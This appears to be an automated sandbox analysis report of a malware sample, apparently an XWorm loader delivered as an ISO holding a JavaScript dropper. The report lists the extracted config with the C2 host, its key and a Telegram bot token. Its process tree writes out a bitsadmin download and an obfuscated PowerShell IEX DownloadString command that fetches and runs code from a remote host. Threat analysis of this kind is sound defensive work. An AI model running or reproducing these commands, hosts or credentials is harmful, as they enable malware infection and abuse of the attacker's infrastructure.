Analysis
-
max time kernel
1022s -
max time network
1047s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
30-08-2024 14:31
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
xworm
5.0
yolomesho.work.gd:7000
oUFURe5xwVr67Kd5
-
install_file
USB.exe
Extracted
gurcu
https://api.telegram.org/bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessag
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/636-291-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm -
Blocklisted process makes network request 3 IoCs
flow pid Process 83 3600 powershell.exe 85 3600 powershell.exe 87 3600 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 3600 powershell.exe 4644 powershell.exe 4692 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 5728 bitsadmin.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: msedge.exe File opened (read-only) \??\E: WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 3 bitbucket.org 6 bitbucket.org -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 84 api.ipify.org 85 api.ipify.org -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4644 set thread context of 636 4644 powershell.exe 144 PID 4692 set thread context of 5352 4692 powershell.exe 202 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003 msedge.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\HardwareID msedge.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Service msedge.exe -
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133695021353786451" chrome.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings firefox.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 238774.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 4492 msedge.exe 4492 msedge.exe 2628 msedge.exe 2628 msedge.exe 1532 identity_helper.exe 1532 identity_helper.exe 3312 msedge.exe 3312 msedge.exe 3600 powershell.exe 3600 powershell.exe 3600 powershell.exe 4644 powershell.exe 4644 powershell.exe 4644 powershell.exe 4644 powershell.exe 4644 powershell.exe 1892 chrome.exe 1892 chrome.exe 5984 msedge.exe 5984 msedge.exe 6136 msedge.exe 6136 msedge.exe 5020 identity_helper.exe 5020 identity_helper.exe 4692 powershell.exe 4692 powershell.exe 4692 powershell.exe 4692 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
pid Process 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 6136 msedge.exe 6136 msedge.exe 6136 msedge.exe 6136 msedge.exe 6136 msedge.exe 6136 msedge.exe 6136 msedge.exe 6136 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeManageVolumePrivilege 2628 msedge.exe Token: SeManageVolumePrivilege 2628 msedge.exe Token: SeDebugPrivilege 3600 powershell.exe Token: SeIncreaseQuotaPrivilege 3600 powershell.exe Token: SeSecurityPrivilege 3600 powershell.exe Token: SeTakeOwnershipPrivilege 3600 powershell.exe Token: SeLoadDriverPrivilege 3600 powershell.exe Token: SeSystemProfilePrivilege 3600 powershell.exe Token: SeSystemtimePrivilege 3600 powershell.exe Token: SeProfSingleProcessPrivilege 3600 powershell.exe Token: SeIncBasePriorityPrivilege 3600 powershell.exe Token: SeCreatePagefilePrivilege 3600 powershell.exe Token: SeBackupPrivilege 3600 powershell.exe Token: SeRestorePrivilege 3600 powershell.exe Token: SeShutdownPrivilege 3600 powershell.exe Token: SeDebugPrivilege 3600 powershell.exe Token: SeSystemEnvironmentPrivilege 3600 powershell.exe Token: SeRemoteShutdownPrivilege 3600 powershell.exe Token: SeUndockPrivilege 3600 powershell.exe Token: SeManageVolumePrivilege 3600 powershell.exe Token: 33 3600 powershell.exe Token: 34 3600 powershell.exe Token: 35 3600 powershell.exe Token: 36 3600 powershell.exe Token: SeIncreaseQuotaPrivilege 3600 powershell.exe Token: SeSecurityPrivilege 3600 powershell.exe Token: SeTakeOwnershipPrivilege 3600 powershell.exe Token: SeLoadDriverPrivilege 3600 powershell.exe Token: SeSystemProfilePrivilege 3600 powershell.exe Token: SeSystemtimePrivilege 3600 powershell.exe Token: SeProfSingleProcessPrivilege 3600 powershell.exe Token: SeIncBasePriorityPrivilege 3600 powershell.exe Token: SeCreatePagefilePrivilege 3600 powershell.exe Token: SeBackupPrivilege 3600 powershell.exe Token: SeRestorePrivilege 3600 powershell.exe Token: SeShutdownPrivilege 3600 powershell.exe Token: SeDebugPrivilege 3600 powershell.exe Token: SeSystemEnvironmentPrivilege 3600 powershell.exe Token: SeRemoteShutdownPrivilege 3600 powershell.exe Token: SeUndockPrivilege 3600 powershell.exe Token: SeManageVolumePrivilege 3600 powershell.exe Token: 33 3600 powershell.exe Token: 34 3600 powershell.exe Token: 35 3600 powershell.exe Token: 36 3600 powershell.exe Token: SeIncreaseQuotaPrivilege 3600 powershell.exe Token: SeSecurityPrivilege 3600 powershell.exe Token: SeTakeOwnershipPrivilege 3600 powershell.exe Token: SeLoadDriverPrivilege 3600 powershell.exe Token: SeSystemProfilePrivilege 3600 powershell.exe Token: SeSystemtimePrivilege 3600 powershell.exe Token: SeProfSingleProcessPrivilege 3600 powershell.exe Token: SeIncBasePriorityPrivilege 3600 powershell.exe Token: SeCreatePagefilePrivilege 3600 powershell.exe Token: SeBackupPrivilege 3600 powershell.exe Token: SeRestorePrivilege 3600 powershell.exe Token: SeShutdownPrivilege 3600 powershell.exe Token: SeDebugPrivilege 3600 powershell.exe Token: SeSystemEnvironmentPrivilege 3600 powershell.exe Token: SeRemoteShutdownPrivilege 3600 powershell.exe Token: SeUndockPrivilege 3600 powershell.exe Token: SeManageVolumePrivilege 3600 powershell.exe Token: 33 3600 powershell.exe Token: 34 3600 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 2628 msedge.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 1892 chrome.exe 5428 firefox.exe 5428 firefox.exe 5428 firefox.exe 5428 firefox.exe 5428 firefox.exe 5428 firefox.exe 5428 firefox.exe 5428 firefox.exe 5428 firefox.exe 5428 firefox.exe 5428 firefox.exe 5428 firefox.exe 5428 firefox.exe 5428 firefox.exe 5428 firefox.exe 5428 firefox.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 5428 firefox.exe 5428 firefox.exe 5428 firefox.exe 5428 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2628 wrote to memory of 1780 2628 msedge.exe 83 PID 2628 wrote to memory of 1780 2628 msedge.exe 83 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 716 2628 msedge.exe 84 PID 2628 wrote to memory of 4492 2628 msedge.exe 85 PID 2628 wrote to memory of 4492 2628 msedge.exe 85 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 PID 2628 wrote to memory of 3220 2628 msedge.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bitbucket.org/xyzcrypter/lmfu/downloads/New_Document-3765618.iso1⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff83d7446f8,0x7ff83d744708,0x7ff83d7447182⤵PID:1780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:22⤵PID:716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:82⤵PID:3220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:1988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:12⤵PID:4948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:82⤵PID:4184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3964 /prefetch:82⤵PID:876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:12⤵PID:1980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:12⤵PID:3524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6288 /prefetch:12⤵PID:1036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5724 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:12⤵PID:2824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:12⤵PID:1552
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3048
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2100
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "E:\New_Document-#3765618.js"1⤵
- Checks computer location settings
- Enumerates connected drives
PID:5680 -
C:\Windows\System32\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/mes/010111100110101101001111111101011011100101011110 C:\Users\Admin\AppData\Local\Temp\pmqfgkdqzsbsvsamfrryrizflqdvvwqqctmqvepuyuplixbkjbforifcqtpxeylsnfsloatiuqykwi2⤵
- Download via BitsAdmin
PID:5728
-
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\Admin\AppData\Local\Temp\pmqfgkdqzsbsvsamfrryrizflqdvvwqqctmqvepuyuplixbkjbforifcqtpxeylsnfsloatiuqykwi2⤵
- Checks computer location settings
PID:5356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://aeroox.000webhostapp.com/mes/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3600
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:6136
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"1⤵
- Checks computer location settings
PID:4752 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "2⤵PID:5552
-
C:\Windows\system32\cmd.execmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"3⤵PID:6136
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4644 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"5⤵PID:1460
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"5⤵
- System Location Discovery: System Language Discovery
PID:636
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1892 -
